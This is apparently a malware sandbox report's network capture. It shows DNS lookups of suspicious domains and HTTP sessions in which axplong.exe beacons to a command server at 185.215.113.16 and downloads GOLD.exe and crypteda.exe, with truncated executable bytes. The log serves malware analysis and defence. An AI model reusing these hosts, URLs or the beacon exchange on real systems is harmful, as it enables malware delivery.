Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 26, 2024 23:29:33.743973017 CEST	192.168.2.7	1.1.1.1	0x5427	Standard query (0)	fivexx5vs.top	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:42.862315893 CEST	192.168.2.7	1.1.1.1	0x63fd	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:43.871556044 CEST	192.168.2.7	1.1.1.1	0x63fd	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:44.871742964 CEST	192.168.2.7	1.1.1.1	0x63fd	Standard query (0)	yosoborno.com	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:59.613348007 CEST	192.168.2.7	1.1.1.1	0x7ad0	Standard query (0)	oytrtojfgh.asia	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:30:16.188922882 CEST	192.168.2.7	1.1.1.1	0x27a9	Standard query (0)	jirafasaltas.fun	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 26, 2024 23:29:34.705862045 CEST	1.1.1.1	192.168.2.7	0x5427	No error (0)	fivexx5vs.top		195.133.48.136	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:35.998845100 CEST	1.1.1.1	192.168.2.7	0xf1c8	Name error (3)	jSbXVBiItIINfreBHvLPHxDRe.jSbXVBiItIINfreBHvLPHxDRe	none	none	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		46.100.50.5	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		151.233.51.166	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		220.125.3.190	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		187.204.46.3	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		200.45.93.45	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		186.137.126.27	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		201.212.52.197	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184166908 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		189.161.176.87	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		46.100.50.5	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		151.233.51.166	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		220.125.3.190	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		187.204.46.3	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		200.45.93.45	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		186.137.126.27	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		201.212.52.197	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184185028 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		189.161.176.87	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		46.100.50.5	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		151.233.51.166	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		220.125.3.190	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		187.204.46.3	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		200.45.93.45	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		186.137.126.27	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		201.212.52.197	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:45.184195042 CEST	1.1.1.1	192.168.2.7	0x63fd	No error (0)	yosoborno.com		189.161.176.87	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:29:59.629323959 CEST	1.1.1.1	192.168.2.7	0x7ad0	Name error (3)	oytrtojfgh.asia	none	none	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:30:16.796737909 CEST	1.1.1.1	192.168.2.7	0x27a9	No error (0)	jirafasaltas.fun		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 26, 2024 23:30:16.796737909 CEST	1.1.1.1	192.168.2.7	0x27a9	No error (0)	jirafasaltas.fun		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49723	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:07.932106972 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:08.693001986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:08.698070049 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:08.970231056 CEST	1026	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 34 33 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 30 34 64 33 64 31 64 65 66 64 34 66 37 33 65 62 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 30 65 65 65 34 65 61 61 37 34 66 36 66 65 66 61 61 36 33 36 62 37 37 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 30 35 36 34 34 66 36 39 63 35 62 36 37 65 65 38 62 30 39 65 34 31 36 64 65 33 34 38 63 61 38 62 65 66 64 33 33 61 65 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 65 38 66 38 66 62 62 66 34 39 35 34 [TRUNCATED] Data Ascii: 343 <c>1000002001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a704d3d1defd4f73eb#1000004001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720eee4eaa74f6fefaa636b77#1000005001+++aa0ed36554e19fbff05644f69c5b67ee8b09e416de348ca8befd33aeb3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000129001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a710f9e9b7a65a25ebfc63#1000150001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a731e9f3eeba476ea0e17e76#1000190001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a71bdff1f3b6447fd1f4747c66da7d875fd8f76ca49a#1000191001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a701f5e9f9bc4365cdeb74763cda6696#1000192001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a734f4f4eeb6426efceb6f7d3cda6696#<d>0
Aug 26, 2024 23:29:08.972619057 CEST	52	OUT	GET /inc/GOLD.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:09.218493938 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:09 GMT Content-Type: application/octet-stream Content-Length: 330792 Last-Modified: Sun, 18 Aug 2024 13:17:05 GMT Connection: keep-alive ETag: "66c1f451-50c28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 ea c1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 fe f9 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 f9 04 00 53 00 00 00 00 00 05 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 70 f8 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @`S(& p H.text `.rsrc@@.reloc @BH#tj `t-z-rNekMXwabj#O1$OU.]AMK!],ZwR^#U(QD}zm_ "!z#79yY2lc5>l[WIC9FkJ}X_X"qP4pX"d6&\a]"Tv>@GIc4PJzjpryrfH6#kqzT+S0Ap1.f\|P#XXm+p:+q#X
Aug 26, 2024 23:29:09.218518019 CEST	1236	IN	Data Raw: 7d 2c 6e 68 1a 4c b6 4e 1a 27 02 2c 1c ee 30 7c 3a 2e 72 b3 45 c9 33 ad 8b 25 59 eb bf e7 75 37 56 4e b4 ab f7 a6 3e 57 d4 77 ec 37 6e 15 8c 3b 6a cb a8 9d 6f 72 3d ce 6d 36 2d 50 c1 7d dd 1a 28 74 32 0b 0b e4 71 65 7f 6b ed b2 88 f2 1f 6c 8c 05 Data Ascii: },nhLN',0\|:.rE3%Yu7VN>Ww7n;jor=m6-P}(t2qekl&Tn[3JyqL-Z."Jwdj5.{D'N.W,a[=[?Q_i&_c!gL0uI__/_jV`+
Aug 26, 2024 23:29:09.218533993 CEST	448	IN	Data Raw: 6f 17 37 20 99 24 30 aa 84 a5 3c a1 97 57 3b d6 51 af 3d 87 6d 59 ae f6 2f 4b 82 fd 2e 1f b8 41 76 90 9e c6 fb b3 15 78 84 39 b6 73 f8 93 b2 98 8f a3 0e b7 66 ba d3 26 6b b9 11 ef 11 71 00 52 a1 8f 62 d3 b6 63 37 b3 37 12 6b 7f c3 2c 01 ab 53 64 Data Ascii: o7 $0<W;Q=mY/K.Avx9sf&kqRbc77k,SdfF?k[w`DL#[sK*alg<'- 4U6<_n1W/su"]g+0\|u&Y))6#uwK"j5'
Aug 26, 2024 23:29:09.218545914 CEST	1236	IN	Data Raw: e6 e6 af 0d d1 2d d6 88 a6 72 19 1c 5b 66 77 48 82 e5 7f 32 31 72 ed 8c c2 bd b4 61 1c 2a c1 22 70 d6 dd ac 20 4a 3d 72 f6 d3 3b 56 17 33 2e 35 14 da a4 0b 75 4b 8e b3 25 73 ee ce a0 06 40 bc 53 18 87 50 ad b7 54 3b eb d8 ac 3f 7d 86 33 d9 eb 01 Data Ascii: -r[fwH21ra*"p J=r;V3.5uK%s@SPT;?}3<xfF:2tF%4L7Sn_F`2>PtNp^hRe%Wkol~zb%v4{HK~x>Ix2FuR_"GOGE,LhHi_#gxd
Aug 26, 2024 23:29:09.218559980 CEST	1236	IN	Data Raw: 5e 4f de b8 82 b7 c0 fc d0 59 00 92 f1 df fc a6 93 97 5d 96 40 01 2f ad 1e 86 ca 77 94 48 7c 7c 8a 74 51 ec d4 60 94 38 59 79 d5 d9 88 42 da d9 9a 41 fe 26 05 4b db 18 63 6e 71 cb 89 45 a6 ed 1b 05 e2 de b9 de e9 8e 73 8a ea 62 c9 8d 28 f8 f0 ff Data Ascii: ^OY]@/wH\|\|tQ`8YyBA&KcnqEsb(;/;4f%RP~p&OQ.;m-I&z,E)L$w%RCeuDX-I?ll~%`m'pupP$F0`i,_
Aug 26, 2024 23:29:09.218573093 CEST	1236	IN	Data Raw: 0f 66 e5 73 5f 7e 4a db 17 0f 35 2e 35 5f d2 9d ae 6e 08 7e 0f 0c 20 8d e0 e0 70 54 65 fa a9 1c e8 c0 d2 a3 3a 7f b3 8b 54 51 89 f6 ee 8b a3 3c 0f b7 91 da 95 03 40 94 3c 3c cc 63 b4 d3 3c 19 0c ef 6d 65 b8 40 98 97 68 4a ee 81 88 c4 c8 76 73 7a Data Ascii: fs_~J5.5_n~ pTe:TQ<@<<c<me@hJvsz+H=m%ozZ{%v`%6*;}AlGdq9YWxnpsK/(+K$GmUyeV~NbyrihAyx@$r}
Aug 26, 2024 23:29:09.218585014 CEST	372	IN	Data Raw: b6 6a 5e 3f 93 ce 76 7b d0 cd 71 c6 73 43 92 17 4e 03 9e 6a b9 b6 bd 91 e1 a2 93 25 0d 6f 4d 8d 73 43 fe 1e 20 61 8a 1f 57 06 05 dd e2 cc c0 b3 78 41 b4 8c b6 34 2f 53 3a 02 df b0 7a da 00 57 85 81 3c 93 56 d6 ca 12 fd ec 24 f1 33 11 50 31 79 6a Data Ascii: j^?v{qsCNj%oMsC aWxA4/S:zW<V$3P1yj_SZ-sGp+q{yD(ifJ __),kXt)loeETx\|zdMVumb?-pHGw4p)4%*FiKwnGvi'8
Aug 26, 2024 23:29:09.218827009 CEST	1236	IN	Data Raw: 68 62 a4 f0 4d ab b8 4c 5c 7b 1b 45 b1 c6 12 7b c9 87 cd cd da 19 75 0a 6b 1b a3 b7 c9 46 9a a8 c2 d8 10 33 a1 36 02 2f ac 08 d9 be f0 d7 b0 76 fd 54 bb 38 1e 59 a2 f2 ab 5e 5a 01 ba f3 12 99 d0 60 4e 58 1d 4a f5 ae f3 38 16 8b f9 5f dc 3a ed 86 Data Ascii: hbML\{E{ukF36/vT8Y^Z`NXJ8_:5t%_fW9~"0Qha\VAp.Q,CH^hrTdiK:DG,35}r+ce[FD\|mo3F<M:M3 S/co@7v!qc0Y[py7
Aug 26, 2024 23:29:09.218858004 CEST	1236	IN	Data Raw: 5e 60 25 93 d6 cb 37 94 1c e1 28 91 69 f8 75 2a 3e 44 75 7f 97 ce 8f e8 ce d3 4f f9 45 52 31 64 2e 7b b8 2f 6c e7 cc 58 1d a6 40 3a 7e 2a 02 e7 fe 1c 17 23 34 93 3a 18 04 cf 3a 74 d7 e3 b0 ff 07 fa 1f f1 89 44 66 b3 98 91 5c 92 1a 6f ef 8b e3 70 Data Ascii: ^`%7(iu>DuOER1d.{/lX@:~#4::tDf\op&!nLuT{Ax%'oFX6*[_W@lVXP~{Z@)^$@`y")I7O8dT\].dCSkjI{Mri^i`
Aug 26, 2024 23:29:09.218869925 CEST	1236	IN	Data Raw: 66 4a f2 5b 8e 71 00 29 ab 77 a8 1f 9e 93 fb a8 03 87 2c 87 c3 9a 18 1a 82 43 c6 fe a0 39 dc 27 b4 05 54 0b b2 04 ef 2f a9 59 6b 16 03 06 54 81 98 0b 8d 85 52 43 61 85 b2 13 34 11 32 5e fc 60 e1 9c a9 bd 46 e7 ad 3e 47 0e 45 3c 46 15 33 49 81 1b Data Ascii: fJ[q)w,C9'T/YkTRCa42^`F>GE<F3IPV{e1wGoo0\/kVIxlO^B1_ey%+;\\|&@A$c9O.R:I'RHIt!}:J:\|k!1]
Aug 26, 2024 23:29:09.218899012 CEST	1236	IN	Data Raw: 97 af 2e ee 3a 76 71 76 6d 0c ae 09 9c c8 c2 59 fb 81 e5 c2 da 1a 6e f5 71 46 06 0d 0a 11 d4 7c 74 6d 6e bb 3a 7d a0 b4 9e d2 f9 63 fc 43 52 eb 45 77 3b e3 ad 0d 42 1b 46 7f d2 3a 2a 6b 1e 2b 28 3c ff 7f f0 1e ec 51 ff 5c e9 32 a4 ba 68 e6 ce db Data Ascii: .:vqvmYnqF\|tmn:}cCREw;BF:*k+(<Q\2h:XC~c. -4FT\D^0'ZZ/\mR\GP/;w~G8YPF1[vqw8$qVOl9U5^jS ]QIl9iJwvD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49724	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:10.526343107 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Aug 26, 2024 23:29:11.284282923 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:11.285593033 CEST	56	OUT	GET /inc/crypteda.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:11.531470060 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:11 GMT Content-Type: application/octet-stream Content-Length: 1104936 Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT Connection: keep-alive ETag: "66c34110-10dc28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\f @ `O(& H.text$ `.rsrc@@.reloc@BHLvlTp#E'&@cCtE% pr*QAUv6V=CxGHEi(hhqBf}gL-S1),p$8ij37!TsT[XPUEcjs]EqXwsSYg)7IOKm(d(T0`V`oEG#Iqlh9+>6Q=S -#]rAR1?[}ljqD$NxE1px[h~idu!x
Aug 26, 2024 23:29:11.531512976 CEST	164	IN	Data Raw: a8 6f 02 c3 44 0b cf 79 75 65 b6 a9 e5 53 cc 1d 2f 7a 18 99 3e 0f 7c c6 21 e6 20 96 30 e8 bd 5e 1b f7 ca b8 77 ac 58 c0 9c 99 22 d0 f8 f1 50 39 cf 31 b1 8b e2 03 cb 10 7c cf 40 6c cf 13 ee cf f8 ae c3 d3 1d 4c f4 43 0f 60 6c 3e dc e5 43 55 f5 73 Data Ascii: oDyueS/z>\|! 0^wX"P91\|@lLC`l>CUsH1Ucjv)X+nK6w: ZUa.Ll?rX]083G$)Ms@' dAMm8F
Aug 26, 2024 23:29:11.531548977 CEST	1236	IN	Data Raw: 59 8d b2 7e 67 7d 78 5f 42 0a 2f ad e3 51 8e ea e5 f4 c0 14 4b 25 62 5b 1f b2 f8 10 46 0f e8 71 01 07 c6 f4 e1 de 8b a0 85 e5 e3 d3 83 8e 14 ca c3 48 eb 37 15 3e 26 d0 bd 03 f8 36 51 1f 86 78 5a 79 a0 94 95 4e aa b6 da 5d 3d 57 91 96 a1 11 ea 11 Data Ascii: Y~g}x_B/QK%b[FqH7>&6QxZyN]=Wyym:AndnRs_5`=69W=wxk\LiVA pRTQ\|u9=0=KIFo\n/w}UOs\|V5TT02+^,vXO+?zrZIy;F
Aug 26, 2024 23:29:11.531583071 CEST	1236	IN	Data Raw: 51 fa 08 04 53 78 fd e5 03 cb 18 f6 58 45 b0 d8 8e cf 0f b3 9e 15 68 f3 0f c6 75 65 b1 1d 43 82 96 11 ff 8d cb df ce 5e 3b ee bf f0 94 1f 0a d9 4a c7 23 18 cb 51 98 b1 5b 5b 66 83 33 e6 9f c3 6d de ff 7a ee c4 e5 39 0f f0 e0 0b 59 eb bc bc 94 cd Data Ascii: QSxXEhueC^;J#Q[[f3mz9Y'@KQNgl@5}\|."s},cE!es_RwJ7RyR$]0-GK7yaLr/?Bg_yIVjLB5Ul=@
Aug 26, 2024 23:29:11.531615973 CEST	1236	IN	Data Raw: 68 41 e8 d1 24 61 59 f1 85 4d 91 cf 05 4f 7f f1 57 40 8e 83 8f 7f 1e f5 08 24 f0 ca 04 ee d2 6d a6 47 52 fc 79 7a c7 38 d4 ce 9e ae e1 c3 9b b0 5c 81 1c b8 63 eb 69 91 cc cd 7d 11 ac 13 78 e9 91 c3 d8 12 6b f8 03 75 b5 5d b7 4e 5e 6d 60 4d 3a 50 Data Ascii: hA$aYMOW@$mGRyz8\ci}xku]N^m`M:Pv:%y&zUcBO'_5DMXMSikU#F3D8M<@xBkP:3?/O~&p/wk7[.%m~'
Aug 26, 2024 23:29:11.531651974 CEST	672	IN	Data Raw: e6 ee 21 01 83 5a b1 b4 6b c9 a2 cc 38 8e c2 9f 27 46 90 3d 10 cd 45 2e f2 d3 cc 68 dd 71 6c 81 b9 66 93 ec 60 b1 17 8c a6 3d d4 96 b3 fb 25 27 03 ce 08 9c 92 9e e8 73 f4 5c 86 9f de fb b7 8a fa 13 7c 62 11 e8 12 9f 13 ca 2f 2c 2d cd 90 7a f7 16 Data Ascii: !Zk8'F=E.hqlf`=%'s\\|b/,-zNG9n?.](y1tW>6~!kA}p;%b=wnltCSWHE9d*h&pB "$iQ\J>4z
Aug 26, 2024 23:29:11.531799078 CEST	1220	IN	Data Raw: 34 bc 73 c1 b6 09 3a 46 1e 0e e7 31 c7 a0 71 44 a4 f3 71 31 4f 6d 62 1b fd 6e 2e 9c bf 8b bf d7 8d df b9 cb b4 7f 66 87 8e bf d9 48 cb bc cd 7e 4e 55 f7 a5 ba 20 23 f5 96 93 ca 87 54 e9 d1 a4 14 a9 e1 3f 82 7e 67 4b 2d c3 c2 a5 30 98 3b 6c 74 b8 Data Ascii: 4s:F1qDq1Ombn.fH~NU #T?~gK-0;ltA@%B;XevP mX"1W/vPVEc+=E/QE2HX7L.YVMMr-)7DqA0)3'nenFnoV>8#7iz
Aug 26, 2024 23:29:11.532005072 CEST	1236	IN	Data Raw: f6 90 a1 d3 e9 17 e5 f5 e5 82 ce 9c 4f 85 bc dc 11 88 b3 a8 e0 6a 1b 9b c8 54 77 db c4 52 a2 4f a8 74 14 3f ef f6 d7 f7 5b aa aa a9 84 1b 72 8f 60 c7 0d f5 64 1b 13 4f b7 8b df 9b e6 8c b4 44 91 1e cb f4 5d 7f 00 a5 81 e7 a4 07 d4 ca 55 b6 d3 81 Data Ascii: OjTwROt?[r`dOD]UX"Viv-'B$fG=w,nuZg!"iatf!:Kh]Jpj6d9{nIST5K@;*~lM\vJ!kj>>kN;UoK.
Aug 26, 2024 23:29:11.532058001 CEST	1236	IN	Data Raw: 37 05 46 83 28 b3 0b c4 b5 02 7e 8b c8 cb e7 35 bd f2 8d 1d 3c 9a 59 5e 7c ee 04 f0 47 c0 ae 95 8d 20 c3 d7 ec 21 a1 37 22 42 22 b1 41 32 df 19 81 26 1e 42 26 7d 5c 8c a8 fa 28 01 4f 84 76 5f 1d c9 f1 a2 28 fb 50 0a 88 fa 15 a6 0b b7 01 8b 86 2d Data Ascii: 7F(~5<Y^\|G !7"B"A2&B&}\(Ov_(P-!iIV,p/r5/~gLfL\|Edsro%%MJ[%@\|4}'*bAFrXrx]./,Iu0JHmNB~8zWTdSoF [A?Wbt.Ogjk
